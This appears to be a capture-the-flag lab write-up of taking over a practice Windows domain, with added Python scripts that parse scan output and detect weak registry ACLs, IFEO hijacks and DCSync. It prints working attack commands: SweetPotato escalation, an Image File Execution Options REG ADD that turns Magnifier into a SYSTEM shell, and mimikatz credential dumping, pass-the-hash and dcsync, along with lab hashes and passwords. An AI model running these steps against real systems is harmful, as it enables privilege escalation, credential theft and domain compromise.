Paid for lab time again; viper is really nice to use.
Entry point
Port scan
Port 1433 is open with MSSQL, and the credentials are sa:1qaz!QAZ.
Connect straight away with MDUT.
First get a session in viper (had to start the lab machine again).
Then upload SweetPotato and get a SYSTEM shell:
shell C:/Users/Public/SweetPotato.exe -a C:/Users/Public/1.exe
Browsing the file system gives the first flag.
Upload fscan to scan the intranet; the results:
start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
(icmp) Target 172.22.8.31 is alive
(icmp) Target 172.22.8.46 is alive
[*] Icmp alive hosts len is: 4
172.22.8.18:1433 open
172.22.8.46:445 open
172.22.8.15:88 open
172.22.8.46:135 open
172.22.8.31:445 open
172.22.8.15:445 open
172.22.8.18:445 open
172.22.8.46:139 open
172.22.8.31:139 open
172.22.8.15:139 open
172.22.8.18:139 open
172.22.8.31:135 open
172.22.8.15:135 open
172.22.8.18:135 open
172.22.8.46:80 open
172.22.8.18:80 open
[*] alive ports len is: 16
start vulscan
[*] NetBios: 172.22.8.15 [+]DC XIAORANG\DC01
[*] NetInfo:
[*]172.22.8.31
[->]WIN19-CLIENT
[->]172.22.8.31
[*] NetInfo:
[*]172.22.8.46
[->]WIN2016
[->]172.22.8.46
[*] NetBios: 172.22.8.31 XIAORANG\WIN19-CLIENT
[*] NetInfo:
[*]172.22.8.15
[->]DC01
[->]172.22.8.15
[*] NetInfo:
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:18ed:38d2:d89d:38b3
[*] NetBios: 172.22.8.46 WIN2016.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle: http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[*] WebTitle: http://172.22.8.46 code:200 len:703 title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa 1qaz!QAZ
So there are four machines:
172.22.8.18 done
172.22.8.15 domain controller
172.22.8.31 domain member
172.22.8.46 domain member
shell net user shows there is also a user named john.
Find explorer, inject into the process and get a session as john.
shell net use shows john has a mounted share.
tsclient is obviously the hint, so I browse it and find a credential.txt inside.
Opening it gives a username and password --> xiaorang.lab\Aldrich:Ald@rLMWuy7Z!#, plus a hint about "hijack Image"; a search says this is Image File Execution Options hijacking, which seems to be a registry change.
Start a proxy in viper, connect through proxychains4 and RDP in manually with this account; it demands a password change with complexity requirements, so I changed it to Zys@gmzb!@#.
Tried it; the results:
172.22.8.15: no RDP
172.22.8.31: cannot log in
172.22.8.46: login succeeded
For some reason rdesktop connected to 172.22.8.46 but I could not do anything before it dropped, so I switched to Proxifier on Windows and connected from there; login succeeded, but it is horribly laggy.
Set up a port forward in viper from port 1234 on .18 to the listener on the VPS, then get a session as Aldrich.
Next is presumably the image hijack for privilege escalation; I know nothing about it, so I am just copying along.
Run this command in the RDP session:
get-acl -path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options" | fl *
The result:
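The four-line inventory above is what fscan's output boils down to, and a defender reviewing a scan of their own network wants the same fold done mechanically. The following parser is an added example, not part of the original post and not fscan's own code; it reads the line formats shown above (icmp, open port, NetBios, the multi-line NetInfo block, WebTitle and the [+] service line) from a constructed sample with the credential redacted, and builds one record per host plus a role summary.

```python
import re
from collections import defaultdict

# Constructed sample in the shape of the fscan output above (credential redacted).
SAMPLE = """start infoscan
(icmp) Target 172.22.8.18 is alive
(icmp) Target 172.22.8.15 is alive
[*] Icmp alive hosts len is: 2
172.22.8.18:1433 open
172.22.8.15:88 open
172.22.8.18:445 open
172.22.8.18:80 open
[*] alive ports len is: 4
start vulscan
[*] NetBios: 172.22.8.15 [+]DC XIAORANG\\DC01
[*] NetInfo:
[*]172.22.8.18
[->]WIN-WEB
[->]172.22.8.18
[->]2001:0:348b:fb58:18ed:38d2:d89d:38b3
[*] WebTitle: http://172.22.8.18 code:200 len:703 title:IIS Windows Server
[+] mssql:172.22.8.18:1433:sa <redacted>
"""

IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
ALIVE_RE = re.compile(rf"^\(icmp\) Target ({IPV4}) is alive$")
PORT_RE = re.compile(rf"^({IPV4}):(\d+) open$")
NETBIOS_RE = re.compile(rf"^\[\*\] NetBios: ({IPV4}) (.+)$")
NETINFO_HOST_RE = re.compile(rf"^\[\*\]({IPV4})$")
NETINFO_ITEM_RE = re.compile(r"^\[->\](.+)$")
WEB_RE = re.compile(r"^\[\*\] WebTitle: (\S+) code:(\d+) len:(\d+) title:(.*)$")
CRED_RE = re.compile(rf"^\[\+\] (\w+):({IPV4}):(\d+):(.*)$")


def _new_host():
    return {"ports": set(), "names": [], "addresses": [], "web": [], "creds": [], "dc": False}


def _is_address(item):
    # IPv4 dotted quads and IPv6 colon groups; a hostname never contains ':' or '.' here
    return bool(re.fullmatch(r"[0-9a-fA-F:.]+", item)) and any(c in item for c in ":.")


def parse_fscan(text):
    """Fold fscan's line-oriented output into one record per host."""
    hosts = defaultdict(_new_host)
    current = None  # host whose multi-line NetInfo block is open
    for raw in text.splitlines():
        line = raw.strip()
        if m := ALIVE_RE.match(line):
            hosts[m.group(1)]  # register the host even if nothing else is found
            current = None
        elif m := PORT_RE.match(line):
            hosts[m.group(1)]["ports"].add(int(m.group(2)))
            current = None
        elif m := NETBIOS_RE.match(line):
            ip, rest = m.groups()
            if "[+]DC" in rest:  # fscan marks domain controllers this way
                hosts[ip]["dc"] = True
                rest = rest.replace("[+]DC", "").strip()
            hosts[ip]["names"].append(rest)
            current = None
        elif m := NETINFO_HOST_RE.match(line):
            current = m.group(1)
        elif (m := NETINFO_ITEM_RE.match(line)) and current:
            item = m.group(1)
            bucket = "addresses" if _is_address(item) else "names"
            hosts[current][bucket].append(item)
        elif m := WEB_RE.match(line):
            url, code, _length, title = m.groups()
            ip = re.search(IPV4, url).group(0)
            hosts[ip]["web"].append({"url": url, "code": int(code), "title": title})
            current = None
        elif m := CRED_RE.match(line):
            service, ip, port, cred = m.groups()
            hosts[ip]["creds"].append((service, int(port), cred))
            current = None
    return dict(hosts)


def summarize(hosts):
    """Role per host: the judgement the four-line inventory above makes by hand."""
    summary = {}
    for ip, h in sorted(hosts.items(), key=lambda kv: tuple(map(int, kv[0].split(".")))):
        if h["dc"] or 88 in h["ports"]:  # Kerberos on 88 is a DC tell even without the NetBios tag
            role = "domain controller"
        elif h["web"] or 80 in h["ports"]:
            role = "web server"
        else:
            role = "domain member"
        if h["creds"]:
            role += ", weak service credential found"
        summary[ip] = role
    return summary


if __name__ == "__main__":
    for ip, role in summarize(parse_fscan(SAMPLE)).items():
        print(ip, role)
```

The "weak service credential found" tag is the finding a defender cares about most in this scan: a SQL Server sa login guessable from outside is the whole entry point of this range.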
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
PSChildName : Image File Execution Options
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
CentralAccessPolicyId :
CentralAccessPolicyName :
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Owner : NT AUTHORITY\SYSTEM
Group : NT AUTHORITY\SYSTEM
Access : {System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule, System.Security.AccessControl.RegistryAccessRule...}
Sddl : O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)
AccessToString : CREATOR OWNER Allow FullControl
NT AUTHORITY\Authenticated Users Allow SetValue, CreateSubKey, ReadKey
NT AUTHORITY\SYSTEM Allow FullControl
BUILTIN\Administrators Allow FullControl
BUILTIN\Users Allow ReadKey
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES Allow ReadKey
AuditToString :
AccessRightType : System.Security.AccessControl.RegistryRights
AccessRuleType : System.Security.AccessControl.RegistryAccessRule
AuditRuleType : System.Security.AccessControl.RegistryAuditRule
AreAccessRulesProtected : True
AreAuditRulesProtected : False
AreAccessRulesCanonical : True
AreAuditRulesCanonical : True
This shows that any user who can log on with an account and password (Authenticated Users) can modify this registry key.
So run this command and escalate with Magnifier:
REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
After running it, click the avatar at the bottom left and choose Lock, then click Magnifier at the bottom right: escalated to SYSTEM.
Run the earlier implant from that shell to get a SYSTEM session, and flag2.
Running net group "domain admins" /domain shows WIN2016$ is in Domain Admins, so we can pass the hash to get onto the DC.
In msf, just use mimikatz:
load kiwi
kiwi_cmd sekurlsa::logonpasswords
We get WIN2016$'s hash:
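The decisive line in that output is the Sddl string: the ACE (A;CI;CCDCLCSWRPRC;;;AU) grants Authenticated Users SetValue and CreateSubKey on a key that only administrators should be able to write. The script below is an added example for auditing that, not code from the post or from any tool it uses. It decodes an SDDL DACL into named registry rights (the two-letter codes map onto the key-specific bits: CC is KEY_QUERY_VALUE, DC is KEY_SET_VALUE, LC is KEY_CREATE_SUB_KEY, and so on, which is why the decoded AU entry matches the AccessToString line above) and reports every allow-ACE that gives a non-administrative principal write access. PAGE_SDDL is the string from the output above; HARDENED_SDDL is a constructed variant with the Authenticated Users ACE reduced to KR (read), showing what the key should look like.

```python
import re

# Bit value behind each SDDL rights code, using the registry meaning of the
# generic positions (CC=0x1 KEY_QUERY_VALUE, DC=0x2 KEY_SET_VALUE, LC=0x4
# KEY_CREATE_SUB_KEY, SW=0x8 KEY_ENUMERATE_SUB_KEYS, RP=0x10 KEY_NOTIFY,
# WP=0x20 KEY_CREATE_LINK) plus the standard rights and the composite codes.
CODE_BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10, "WP": 0x20,
             "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
             "KR": 0x20019, "KW": 0x20006, "KX": 0x20019, "KA": 0xF003F,
             "GR": 0x20019, "GW": 0x20006, "GX": 0x20019, "GA": 0xF003F}
BIT_NAMES = {0x1: "QueryValue", 0x2: "SetValue", 0x4: "CreateSubKey",
             0x8: "EnumerateSubKeys", 0x10: "Notify", 0x20: "CreateLink",
             0x10000: "Delete", 0x20000: "ReadControl", 0x40000: "WriteDac",
             0x80000: "WriteOwner"}
# Anything that lets the holder change the key, its values or its DACL.
WRITE_RIGHTS = {"SetValue", "CreateSubKey", "CreateLink", "Delete", "WriteDac", "WriteOwner"}
WELL_KNOWN = {"CO": "CREATOR OWNER", "AU": "Authenticated Users", "SY": "SYSTEM",
              "BA": "Administrators", "BU": "Users", "AC": "ALL APPLICATION PACKAGES",
              "WD": "Everyone", "IU": "Interactive"}
TRUSTED = {"SY", "BA", "CO"}  # principals expected to hold write access on HKLM keys

# SDDL exactly as the get-acl output above reports it for the IFEO key.
PAGE_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;CCDCLCSWRPRC;;;AU)(A;CI;KA;;;SY)"
             "(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)")
# Constructed variant: the Authenticated Users ACE reduced to read-only (KR).
HARDENED_SDDL = ("O:SYG:SYD:PAI(A;CIIO;KA;;;CO)(A;CI;KR;;;AU)(A;CI;KA;;;SY)"
                 "(A;CI;KA;;;BA)(A;CI;KR;;;BU)(A;CI;KR;;;AC)")


def rights_from_sddl(field):
    """Expand an ACE rights field (two-letter codes or a hex mask) to named registry rights."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
    else:
        mask = 0
        for i in range(0, len(field), 2):
            mask |= CODE_BITS.get(field[i:i + 2], 0)
    names = {name for bit, name in BIT_NAMES.items() if mask & bit}
    if mask & 0xF003F == 0xF003F:  # every key-specific and standard bit: KEY_ALL_ACCESS
        names.add("FullControl")
    return names


def parse_dacl(sddl):
    """Return the DACL's ACEs as dicts: type, flags, rights (set of names), sid, protected."""
    m = re.search(r"D:([A-Z]*)((?:\([^)]*\))*)", sddl)
    if not m:
        return []
    control, ace_text = m.groups()
    aces = []
    for ace in re.findall(r"\(([^)]*)\)", ace_text):
        ace_type, flags, rights, _obj, _inherit_obj, sid = ace.split(";")[:6]
        aces.append({"type": ace_type, "flags": flags, "rights": rights_from_sddl(rights),
                     "sid": sid, "protected": "P" in control})
    return aces


def audit_key_acl(sddl, trusted=TRUSTED):
    """(principal, write rights) for every allow-ACE that lets a non-trusted principal change the key."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["sid"] in trusted:  # deny ACEs and admin/system entries are fine
            continue
        writable = ace["rights"] & WRITE_RIGHTS
        if writable:
            findings.append((WELL_KNOWN.get(ace["sid"], ace["sid"]), sorted(writable)))
    return findings


if __name__ == "__main__":
    for label, sddl in (("as found", PAGE_SDDL), ("hardened", HARDENED_SDDL)):
        print(label, audit_key_acl(sddl) or "no non-admin write access")
```

On a real host the SDDL comes from (Get-Acl "HKLM:\...\Image File Execution Options").Sddl, and the same check applies to any HKLM key that influences process startup; a finding here means every authenticated user on the box can plant a Debugger value, which is exactly what the rest of the writeup does.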
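The REG ADD above leaves a durable artifact: a Debugger value under an IFEO subkey. Hunting for those is the simplest detection of this technique, and the script below is an added example written for that purpose (not from the post or from any tool it uses). It parses text in the shape of reg query "<IFEO key>" /s output from a constructed sample, in which the magnify.exe entry mirrors the command above and the other two entries are made up, and reports every image whose Debugger is not an approved developer tool.

```python
import re
from pathlib import PureWindowsPath

IFEO = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"

# Constructed sample in the shape of `reg query "<IFEO key>" /s` output. The
# magnify.exe entry mirrors the REG ADD command above; the other two are made up.
SAMPLE = rf"""
{IFEO}\magnify.exe
    Debugger    REG_SZ    C:\windows\system32\cmd.exe

{IFEO}\notepad.exe
    GlobalFlag    REG_DWORD    0x0

{IFEO}\devenv.exe
    Debugger    REG_SZ    "C:\Program Files\Example Debugger\dbg.exe" -attach
"""

# A value line: indented name, type, data, separated by runs of spaces.
VALUE_RE = re.compile(r"^\s+(.+?)\s{2,}(REG_[A-Z_]+)\s{2,}(.*)$")


def parse_reg_query(text):
    """Return {key_path: {value_name: (type, data)}} from `reg query /s` style output."""
    keys, current = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():  # key paths start at column 0, values are indented
            current = line.strip()
            keys.setdefault(current, {})
        elif current and (m := VALUE_RE.match(line)):
            name, vtype, data = m.groups()
            keys[current][name] = (vtype, data)
    return keys


def _first_token(command):
    """The executable part of a command line, honouring a quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(None, 1)[0]


def find_ifeo_debuggers(text, allowlist=()):
    """(image, debugger command) for every IFEO subkey whose Debugger is not an approved tool."""
    approved = {PureWindowsPath(p).name.lower() for p in allowlist}
    hits = []
    for key, values in parse_reg_query(text).items():
        if not key.lower().startswith(IFEO.lower() + "\\") or "Debugger" not in values:
            continue
        image = key.rsplit("\\", 1)[1]
        command = values["Debugger"][1]
        if PureWindowsPath(_first_token(command)).name.lower() in approved:
            continue
        hits.append((image, command))
    return hits


if __name__ == "__main__":
    for image, command in find_ifeo_debuggers(SAMPLE):
        print(f"IFEO Debugger set for {image}: {command}")
```

A hit for an accessibility binary such as magnify.exe pointing at a shell is the case from this writeup; remediation is removing the value (reg delete "<subkey>" /v Debugger /f) and fixing the key's ACL so only administrators can write it. For live detection rather than periodic sweeps, registry value-set telemetry scoped to this key path (Sysmon Event ID 13, or Windows object access auditing on the key) catches the write as it happens.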
Authentication Id : 0 ; 15868125 (00000000:00f220dd)
Session : Interactive from 2
User Name : DWM-2
Domain : Window Manager
Logon Server : (null)
Logon Time : 2023/5/18 21:25:27
SID : S-1-5-90-0-2
msv :
[00000003] Primary
* Username : WIN2016$
* Domain : XIAORANG
* NTLM : 11e09d02069737e9646236f46a99effa
* SHA1 : 6f8536dc4da8df2113b93d48d242251918e23947
tspkg :
wdigest :
* Username : WIN2016$
* Domain : XIAORANG
* Password : (null)
kerberos :
* Username : WIN2016$
* Domain : xiaorang.lab
* Password : 19 b5 f6 22 6d 70 51 9b 6c a5 10 f4 c9 cf 9b e2 3c 65 fa 65 15 c4 79 74 32 ba 42 54 dc b4 df a5 ee d5 01 f4 e9 2d 3f 71 11 1a 23 6f 90 0b 68 bc 16 f0 ef 08 7e 2c a7 c1 95 7d a5 60 73 96 ea 90 5b 03 eb ce 66 68 a7 6a a9 52 43 85 cb 91 c1 75 ed 38 4c 61 1d 6f 18 11 25 cc c7 08 0e 46 c7 b0 90 be 68 40 b2 ae 03 35 1a 3d 78 3f 85 4a 4d 6c 40 b2 34 aa 63 90 0b 26 01 15 91 93 31 73 b3 84 bb 37 13 91 63 91 7f 51 04 3b 00 6f 79 fc 96 11 57 03 63 8b 8a 95 13 48 12 f7 43 e4 8f 85 1c 96 f7 17 3d b2 0f 41 34 ed f2 fc 3d 7e df 38 ca fd fc e0 37 26 4a e9 dd c9 76 73 6f a6 cb 49 29 2e 6c fd 8f f0 0c f5 00 26 b4 29 e5 79 e0 93 e6 8e 1a 7e 38 b3 d3 09 dc 3c 1b 40 08 b9 48 ae da 0a a0 cc 31 2f 83 18 c6 d9 6c e4 c4 73 dd cf 01 e1
ssp :
credman :
Inject the hash directly:
mimikatz_x64.exe
privilege::debug
sekurlsa::pth /user:WIN2016$ /domain:xiaorang.lab /ntlm:11e09d02069737e9646236f46a99effa
Then dump the DC hashes:
privilege::debug
lsadump::dcsync /domain:xiaorang.lab /user:Administrator
Object RDN : Administrator
** SAM ACCOUNT **
SAM Username : Administrator
Account Type : 30000000 ( USER_OBJECT )
User Account Control : 00000200 ( NORMAL_ACCOUNT )
Account expiration : 1601/1/1 8:00:00
Password last change : 2023/5/18 20:22:25
Object Security ID : S-1-5-21-3289074908-3315245560-3429321632-500
Object Relative ID : 500
Credentials:
Hash NTLM: 2c9d81bdcf3ec8b1def10328a7cc2f08
ntlm- 0: 2c9d81bdcf3ec8b1def10328a7cc2f08
ntlm- 1: 2c9d81bdcf3ec8b1def10328a7cc2f08
lm - 0: f5a2844be6f8377cf0870618cda7f97c
DC hash obtained:
2c9d81bdcf3ec8b1def10328a7cc2f08
Then pass the hash to log onto the DC 172.22.8.15 and grab flag3.
Quite something.
Done.
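Two things made the final step possible: a computer account (WIN2016$) sitting in Domain Admins, and a DCSync request (lsadump::dcsync) being answered for a principal that is not a domain controller. Both are visible to a defender, and the script below is an added example of checking for them; it is not from the post or from mimikatz. It runs over constructed records that carry the fields of a Windows 4662 (directory object access) event that matter here, with values made up to resemble this lab (DC01$ is the DC, WIN2016$ is the member server), and flags replication-rights use by anything other than a known DC or an approved sync account. The replication-right GUIDs are the standard Active Directory control-access rights.

```python
# Control-access rights that grant directory replication. Any principal that
# exercises these against the domain object can pull every account's hashes.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcf2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit for extended (control-access) rights in 4662

# Constructed records carrying the 4662 fields this check needs; values are
# made up to resemble the lab. DC01$ replicating is normal, WIN2016$ is not.
EVENTS = [
    {"EventID": 4662, "SubjectDomainName": "XIAORANG", "SubjectUserName": "DC01$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcf2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectDomainName": "XIAORANG", "SubjectUserName": "WIN2016$",
     "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcf2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcf2}"},
    {"EventID": 4662, "SubjectDomainName": "XIAORANG", "SubjectUserName": "Aldrich",
     "AccessMask": "0x10",  # an ordinary property read, no replication right involved
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def replication_rights_used(event):
    """Names of the replication rights an event's Properties field references."""
    props = event.get("Properties", "").lower()
    return [name for guid, name in REPLICATION_RIGHTS.items() if guid in props]


def detect_dcsync(events, domain_controllers, approved_accounts=()):
    """(DOMAIN\\account, rights) for every replication request from an unexpected principal."""
    expected = {a.upper() for a in domain_controllers} | {a.upper() for a in approved_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
            continue
        rights = replication_rights_used(ev)
        if not rights:
            continue
        who = ev["SubjectUserName"]
        if who.upper() in expected:
            continue
        alerts.append((f"{ev['SubjectDomainName']}\\{who}", rights))
    return alerts


def computer_accounts_in_group(members):
    """Computer accounts (trailing '$') found in a privileged group's member list."""
    return [m for m in members if m.endswith("$")]


if __name__ == "__main__":
    for who, rights in detect_dcsync(EVENTS, domain_controllers=["DC01$"]):
        print("possible DCSync by", who, "using", ", ".join(rights))
    print("computer accounts in Domain Admins:",
          computer_accounts_in_group(["Administrator", "WIN2016$"]))
```

The approved_accounts parameter exists because some legitimate software (directory synchronisation services, for example) holds replication rights by design; those accounts should be few, named, and reviewed, and everything else exercising these rights is an alert. The group check is the preventive side: a computer account in Domain Admins is what let a machine-account hash turn into domain control here.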